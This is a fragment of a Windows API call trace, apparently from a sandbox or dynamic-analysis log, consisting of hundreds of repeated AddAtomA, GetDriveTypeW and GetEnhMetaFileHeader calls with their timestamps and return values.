[0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) 
returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.422] AddAtomA (lpString=0x0) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 
0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] 